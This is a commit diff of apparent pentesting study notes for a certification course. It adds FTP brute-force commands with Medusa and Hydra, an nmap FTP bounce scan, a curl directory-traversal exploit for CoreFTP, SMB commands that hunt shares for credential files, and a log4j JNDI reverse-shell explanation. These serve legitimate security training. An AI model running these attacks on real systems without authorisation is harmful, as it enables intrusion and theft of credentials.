CPTS: Module Attacking services ->ftp

docs/110-143-993-995-imap-pop3.md

@@ -113,3 +113,10 @@ RSET
 # Closes the connection with the POP3 server
 QUIT
 ```
+
+
+## Installing a mail server: Evolution
+
+```bash
+sudo apt-get install evolution
+```

docs/137-138-139-445-smb.md

@@ -17,7 +17,7 @@ tags:
 
 `Server Message Block` (`SMB`) is a client-server protocol that regulates access to files and entire directories and other network resources such as printers, routers, or interfaces released for the network. It runs mainly on Windows, BUT with the free software project Samba, there is also a solution that enables the use of SMB in Linux and Unix distributions and thus cross-platform communication via SMB.
 
-Basically a SMB server provides arbitrary parts of its local file system as shares. Therefore the hierarchy visible to a client is partially independent of the structure on the server.
+Basically a SMB server provides arbitrary parts of its local file system as shares. Therefore the hierarchy visible to a client is partially independent of the structure on the server. 
 
 Samba is an alternative variant to the SMB server, developed for Unix-based operating system. Samba implements the `Common Internet File System` (`CIFS`) network protocol. [CIFS](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-cifs/934c2faa-54af-4526-ac74-6a24d126724e) is a "dialect" of SMB. In other words, CIFS is a very specific implementation of the SMB protocol, which in turn was created by Microsoft. This allows Samba to communicate with newer Windows systems. Therefore, it usually is referred to as `SMB / CIFS`. However, CIFS is the extension of the SMB protocol. So when we pass SMB commands over Samba to an older NetBIOS service, it usually connects to the Samba server over TCP ports `137`, `138`, `139`, but CIFS uses TCP port `445` only. There are several versions of SMB, including outdated versions that are still used in specific infrastructures.
 
@@ -195,4 +195,89 @@ crackmapexec smb $ip --shares -u '' -p ''
 
 With [metasploit](metasploit), use the module: `auxiliary/scanner/smb/smb_login`
 
-Use this to enumerate users and brute force passwords in a smb service. Later on, use [CrackMapExec](crackmapexec.md) to pursuit the attack.
+Use this to enumerate users and brute force passwords in a smb service. Later on, use [CrackMapExec](crackmapexec.md) to pursuit the attack.
+
+
+## Interacting with SMB using Windows & Linux
+
+### Windows
+
+#### Using the explorer
+
+`[WINKEY] + [R]` to open the Run dialog box and type the file share location, e.g.: `\\$IP$\Finance\`
+
+#### Using cmd
+
+```cmd-session
+net use n: \\$IP$\Finance
+# n: map its content to the drive letter `n`
+
+
+# Provide user and password
+net use n: \\$IP$\Finance /user:plaintext Password123
+
+# how many files the shared folder and its subdirectories contain.
+dir n: /a-d /s /b | find /c ":\"
+# dir	Application
+# n:	Directory or drive to search
+# /a-d	/a is the attribute and -d means not directories
+# /s	Displays files in a specified directory and all subdirectories
+# /b	Uses bare format (no heading information or summary)
+# | find /c ":\\" :  count how many files exist in the directory and subdirectories
+
+# Return files that contain string "cred" in the name
+dir n:\*cred* /s /b
+
+# Return files that contain string "password" within 
+findstr /s /i password n:\*.*
+```
+
+#### Using powershell
+
+```powershell-session
+# List contents of folder Finance
+Get-ChildItem \\$IP$\Finance\
+
+# Connect to a share 
+New-PSDrive -Name "N" -Root "\\$IP\Finance" -PSProvider "FileSystem"
+
+# To provide a username and password with Powershell, we need to create a PSCredential. It offers a centralized way to manage usernames, passwords, and credentials.
+$username = 'plaintext'
+$password = 'Password123'
+$secpassword = ConvertTo-SecureString $password -AsPlainText -Force
+$cred = New-Object System.Management.Automation.PSCredential $username, $secpassword
+New-PSDrive -Name "N" -Root "\\$IP\Finance" -PSProvider "FileSystem" -Credential $cred
+
+# Count elements in a folder
+(Get-ChildItem -File -Recurse | Measure-Object).Count
+
+# Return files that contain string "cred" in the name
+Get-ChildItem -Recurse -Path N:\ -Include *cred* -File
+
+# Return files that contain string "password" within 
+Get-ChildItem -Recurse -Path N:\ | Select-String "password" -List
+```
+
+
+### Linux
+
+```bash
+# mount folder
+sudo mkdir /mnt/Finance
+sudo mount -t cifs -o username=plaintext,password=Password123,domain=. //$IP/Finance /mnt/Finance
+
+# As an alternative, we can use a credential file.
+mount -t cifs //$IP/Finance /mnt/Finance -o credentials=/path/credentialfile
+
+# The file credentialfile has to be structured like this:
+# username=plaintext
+# password=Password123
+# domain=.
+
+# Return files that contain string "cred" in the name  
+find /mnt/Finance/ -name *cred*
+
+# Return files that contain string "password" within 
+grep -rn /mnt/Finance/ -ie password
+
+```

docs/21-ftp.md

@@ -102,6 +102,53 @@ sudo nmap -sV -p21 -sC -A $ip
 [See more about nmap for scanning, running scripts and footprinting](nmap.md) 
 
 
+## Attacking FTP
+### Brute forcing with Medusa
+
+[Medusa Cheat sheet](medusa.md). 
+
+```bash
+# Brute force FTP logging
+medusa -u fiona -P /usr/share/wordlists/rockyou.txt -h $IP -M ftp
+# -u: username
+# -U: list of Usernames
+# -p: password
+# -P: list of passwords
+# -h: host /IP
+# -M: protocol to bruteforce
+```
+
+However Medusa is very slow in comparison to [hydra](hydra.md):
+
+```
+# Example for ftp in a non default port
+hydra -L users.txt -P pass.txt ftp://$ip:2121
+```
+
+
+### FTP Bounce Attack
+
+An FTP bounce attack is a network attack that uses FTP servers to deliver outbound traffic to another device on the network. For instance, consider we are targetting an FTP Server `FTP_DMZ` exposed to the internet. Another device within the same network, `Internal_DMZ`, is not exposed to the internet. We can use the connection to the `FTP_DMZ` server to scan `Internal_DMZ` using the FTP Bounce attack and obtain information about the server's open ports.
+
+```shell-session
+nmap -Pn -v -n -p80 -b anonymous:password@$ipFTPdmz $ipINTERNALdmz
+# -b The `Nmap` -b flag can be used to perform an FTP bounce attack: 
+```
+
+### CoreFTP Server build 725 - Directory Traversal (Authenticated)
+
+[CVE-2022-22836](https://nvd.nist.gov/vuln/detail/CVE-2022-22836) |   [exploit](https://www.exploit-db.com/exploits/50652)
+
+Summary: This FTP service uses an HTTP POST request to upload files. However, the CoreFTP service allows an HTTP PUT request, which we can use to write content to files. 
+
+The [exploit](https://www.exploit-db.com/exploits/50652) for this attack is relatively straightforward, based on a single `cURL` command.
+
+```bash
+curl -k -X PUT -H "Host: <IP>" --basic -u <username>:<password> --data-binary "PoC." --path-as-is https://<IP>/../../../../../../whoops
+```
+
+We create a raw HTTP `PUT` request (`-X PUT`) with basic auth (`--basic -u <username>:<password>`), the path for the file (`--path-as-is https://<IP>/../../../../../whoops`), and its content (`--data-binary "PoC."`) with this command. Additionally, we specify the host header (`-H "Host: <IP>"`) with the IP address of our target system.
+
 ## Other FTP services
 
 ### TFTP

docs/3306-mariadb-mysql.md

@@ -36,6 +36,8 @@ mariadb -h <host/IP> -u root
 
 ## Connect to database: mysql 
 
+### From Linux
+
 ```bash
 # -h host/ip   
 # -u user As default mysql has a root user with no authentication
@@ -46,6 +48,12 @@ mysql -u root -h <host/IP>
 
 ```
 
+### From windows
+
+
+```cmd-session
+mysql.exe -u username -pPassword123 -h $IP
+```
 ## mariadb commands
 
 ```bash

docs/cpts-index.md

@@ -10,35 +10,35 @@ tags:
 # CPTS
 
 
-| Module | Notes |
-| --- |  --  |
-| [Penetration Testing Process](penetration-testing-process.md) |  |
-| [Network Enumeration with Nmap](nmap.md) |  |
-| [Footprinting](footprinting.md): [Infrastructure and web enumeration](web-enumeration.md) [FTP](21-ftp.md) [SMB](137-138-139-445-smb.md) [NFS](2049-nfs-network-file-system.md) [DNS](53-dns.md) [SMTP](25-565-587-simple-mail-tranfer-protocol-smtp.md) [IMAP/POP3](110-143-993-995-imap-pop3.md) [SNMP](161-162-snmp.md) [MySQL](3306-mariadb-mysql.md) [Oracle TNS](1521-oracle-transparent-network-substrate.md) [IPMI](623-intelligent-platform-management-interface-ipmi.md) [SSH](22-ssh.md) [RSYNC](873-rsync.md) [R Services](512-513-514-r-services.md) [RDP](3389-rdp.md) [WinRM](5985-5986-winrm-windows-remote-management.md) [WMI](135-windows-management-instrumentation-wmi.md) |  |
-| [Information Gathering - Web Edition](web-enumeration.md): With tools such as [Gobuster](gobuster.md), [ffuf](ffuf.md), [Burpsuite](burpsuite.md), [Wfuzz](wfuzz.md), [feroxbuster](feroxbuster.md) |  |
-| [Vulnerability Assessment](vulnerability-assessment.md): [nessus](nessus.md), [openvas](openvas.md) |  |
-| File Transfer techniques: [Linux](transferring-files-techniques-linux.md), [Windows](transferring-files-techniques-windows.md), [Code- netcat python php and others](transferring-files-techniques-code.md), [Bypassing file upload restrictions](file-upload.md), [File encryption](file-encryption.md), [Evading techniques when tranferring files](transferring-files-evading-detection.md), [LOLbas Living off the land binaries](lolbins-lolbas-gtfobins.md) |  |
-| Shells & Payloads: [Bind shells](bind-shells.md), [Reverse shells](reverse-shells.md), [Spawn a shell](spawn-a-shell.md), [Web shells](web-shells.md) ([Laudanum](laudanum.md) and [nishang](nishang.md)) |  |
-| Using the Metasploit Framework: [metasploit](metasploit.md) and [msfvenom](msfvenom.md) |  |
-| Password Attacks |  |
-| Attacking Common Services | [FTP](21-ftp.md) [SMB](137-138-139-445-smb.md) [NFS](2049-nfs-network-file-system.md) [DNS](53-dns.md) [SMTP](25-565-587-simple-mail-tranfer-protocol-smtp.md) [IMAP/POP3](110-143-993-995-imap-pop3.md) [SNMP](161-162-snmp.md) [MySQL](3306-mariadb-mysql.md) [Oracle TNS](1521-oracle-transparent-network-substrate.md) [IPMI](623-intelligent-platform-management-interface-ipmi.md) [SSH](22-ssh.md) [RSYNC](873-rsync.md) [R Services](512-513-514-r-services.md) [RDP](3389-rdp.md) [WinRM](5985-5986-winrm-windows-remote-management.md) [WMI](135-windows-management-instrumentation-wmi.md) |   
-| Pivoting, Tunneling, and Port Forwarding |  | 
-| Active Directory Enumeration & Attacks  |  |
-| Using Web Proxies |  |
-| Attacking Web Applications with Ffuf |  |
-| Login Brute Forcing |  |
-| SQL Injection Fundamentals |  |
-| SQLMap Essentials |  |
-| Cross-Site Scripting (XSS) |  |
-| File Inclusion |  |
-| File Upload Attacks |  |
-| Command Injections |  |
-| Web Attacks |  |
-| Attacking Common Applications |  |
-| Linux Privilege Escalation |  |
-| Windows Privilege Escalation |  |
-| Documentation & Reporting |  |
-| Attacking Enterprise Networks |  |
+| Number  | Module | Notes |
+| -- | --- |  --  |
+| 01 | [Penetration Testing Process](penetration-testing-process.md) |  |
+| 02 | [Network Enumeration with Nmap](nmap.md) |  |
+| 03 | [Footprinting](footprinting.md): [Infrastructure and web enumeration](web-enumeration.md) [FTP](21-ftp.md) [SMB](137-138-139-445-smb.md) [NFS](2049-nfs-network-file-system.md) [DNS](53-dns.md) [SMTP](25-565-587-simple-mail-tranfer-protocol-smtp.md) [IMAP/POP3](110-143-993-995-imap-pop3.md) [SNMP](161-162-snmp.md) [MySQL](3306-mariadb-mysql.md) [Oracle TNS](1521-oracle-transparent-network-substrate.md) [IPMI](623-intelligent-platform-management-interface-ipmi.md) [SSH](22-ssh.md) [RSYNC](873-rsync.md) [R Services](512-513-514-r-services.md) [RDP](3389-rdp.md) [WinRM](5985-5986-winrm-windows-remote-management.md) [WMI](135-windows-management-instrumentation-wmi.md) |  |
+| 04 | [Information Gathering - Web Edition](web-enumeration.md): With tools such as [Gobuster](gobuster.md), [ffuf](ffuf.md), [Burpsuite](burpsuite.md), [Wfuzz](wfuzz.md), [feroxbuster](feroxbuster.md) |  |
+| 05 | [Vulnerability Assessment](vulnerability-assessment.md): [nessus](nessus.md), [openvas](openvas.md) |  |
+| 06 | File Transfer techniques: [Linux](transferring-files-techniques-linux.md), [Windows](transferring-files-techniques-windows.md), [Code- netcat python php and others](transferring-files-techniques-code.md), [Bypassing file upload restrictions](file-upload.md), [File encryption](file-encryption.md), [Evading techniques when tranferring files](transferring-files-evading-detection.md), [LOLbas Living off the land binaries](lolbins-lolbas-gtfobins.md) |  |
+| 07 | Shells & Payloads: [Bind shells](bind-shells.md), [Reverse shells](reverse-shells.md), [Spawn a shell](spawn-a-shell.md), [Web shells](web-shells.md) ([Laudanum](laudanum.md) and [nishang](nishang.md)) |  |
+| 08 | Using the Metasploit Framework: [metasploit](metasploit.md) and [msfvenom](msfvenom.md) |  |
+| 09 | Password Attacks |  |
+| 10 | Attacking Common Services | [FTP](21-ftp.md) [SMB](137-138-139-445-smb.md)  [MySQL - 3306](3306-mariadb-mysql.md) and [MySQL](mysql.md), [MSSQL - 1433](1433-mssql.md), and  [MSSQL](mssql.md),  [log4k](log4j.md),   |   
+| 11 | Pivoting, Tunneling, and Port Forwarding |  | 
+| 12 | Active Directory Enumeration & Attacks  |  |
+| 13 | Using Web Proxies |  |
+| 14 | Attacking Web Applications with Ffuf |  |
+| 15 | Login Brute Forcing |  |
+| 16 | SQL Injection Fundamentals |  |
+| 17 | SQLMap Essentials |  |
+| 18 | Cross-Site Scripting (XSS) |  |
+| 19 | File Inclusion |  |
+| 20 | File Upload Attacks |  |
+| 21 | Command Injections |  |
+| 22 | Web Attacks |  |
+| 23 | Attacking Common Applications |  |
+| 24 | Linux Privilege Escalation |  |
+| 25 | Windows Privilege Escalation |  |
+| 26 | Documentation & Reporting |  |
+| 27 | Attacking Enterprise Networks |  |
 
 
 Evaluating [htb-cheatsheet-password-attacks](htb-cheatsheet-password-attacks.md)

docs/hydra.md

@@ -55,6 +55,9 @@ hydra -U http-post-form
 # 	 <url>:<form parameters>:<condition string>[:<optional>[:<optional>]
 # 	 Example: “/login.php:userin=^USER^&passin=^PASS^:incorrect”
 #	 it perform the attack in the login.php page. It uses the input label name userin (or any other, we need to retrieve this from the html code of the form) to insert the dictionary for users. It uses the input label name passin  (or any other, we need to retrieve this from the html code of the form) to insert the dictionary for passwords. It uses the word incorrect to check out the result of the login process (we need to observe the web behaviour to pick a word).
+
+# Example for ftp in a non default port
+hydra -L users.txt -P pass.txt ftp://$ip:2121
 ```
 
 

docs/log4j.md

@@ -127,10 +127,14 @@ Connection: close
 
 Once we send that request, our jndi server will resend the reverse shell:
 
-![jndi server](log4j.md)
+![jndi server](log4j.png)
 
 And in our terminal with the nc listener we will get the reverse shell.
 
+The misinterpretation of the User-Agent leads to a JNDI lookup which is executed as a command from the system with administrator privileges and queries a remote server controlled by the attacker, which in our case is the `Destination` in our concept of attacks. This query requests a Java class created by the attacker and is manipulated for its own purposes. The queried Java code inside the manipulated Java class gets executed in the same process, leading to a remote code execution (`RCE`) vulnerability. GovCERT.ch has created an excellent graphical representation of the Log4j vulnerability worth examining in detail. Source: https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/
+
+![log4j](log4j_1.png)
+
 ## Related labs
 
 [Walkthrough HackTheBox machine: Unified](htb-unified.md).

docs/medusa.md

@@ -0,0 +1,42 @@
+---
+title: medusa 
+author: amandaguglieri
+draft: false
+TableOfContents: true
+tags:
+  - pentesting
+  - brute forcing
+  - windows
+  - passwords
+---
+
+# Medusa
+
+Medusa is a speedy, parallel, and modular, login brute-forcer. The goal is to support as many services which allow remote authentication as possible. The author considers following items as some of the key features of this application:
+
+## Installation 
+
+Pre-installed in Kali.
+
+```bash
+wget http://www.foofus.net/jmk/tools/medusa-2.2.tar.gz
+./configure
+make
+make install
+```
+
+## Basic usage
+
+
+```bash
+# Brute force FTP logging
+medusa -u fiona -P /usr/share/wordlists/rockyou.txt -h $IP -M ftp -n 2121
+# -u: username
+# -U: list of Usernames
+# -p: password
+# -P: list of passwords
+# -h: host /IP
+# -M: protocol to bruteforce
+# -n: for a different non-default port. For instance, port 2121 for ftp 
+```
+

docs/mssql.md

@@ -86,3 +86,42 @@ Misconfigurations to look at:
 - The use of self-signed certificates when encryption is being used. It is possible to spoof self-signed certificates   
 - The use of [named pipes](https://docs.microsoft.com/en-us/sql/tools/configuration-manager/named-pipes-properties?view=sql-server-ver15)
 - Weak & default `sa` credentials. Admins may forget to disable this account
+
+
+## Interact with MSSQL
+
+### From Linux
+
+[sqsh](sqsh.md)
+
+
+```shell-session
+ sqsh -S $IP -U username -P Password123
+```
+
+### From Windows
+
+[sqlcmd](https://docs.microsoft.com/en-us/sql/tools/sqlcmd-utility) 
+
+The `sqlcmd` utility lets you enter Transact-SQL statements, system procedures, and script files through a variety of available modes:
+
+- At the command prompt.
+- In Query Editor in SQLCMD mode.
+- In a Windows script file.
+- In an operating system (Cmd.exe) job step of a SQL Server Agent job.
+
+```cmd-session
+sqlcmd -S $IP -U username -P Password123
+```
+
+### GUI Application
+
+ [mssql-cli](https://github.com/dbcli/mssql-cli), [mssqlclient.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/mssqlclient.py), [dbeaver](https://github.com/dbeaver/dbeaver) 
+
+####  SQL Server Management Studio or SSMS 
+
+Only in windows. Download, install, and connect to database.
+
+#### dbeaver
+
+dbeaver is a multi-platform database tool for Linux, macOS, and Windows that supports connecting to multiple database engines such as MSSQL, MySQL, PostgreSQL, among others, making it easy for us, as an attacker, to interact with common database servers.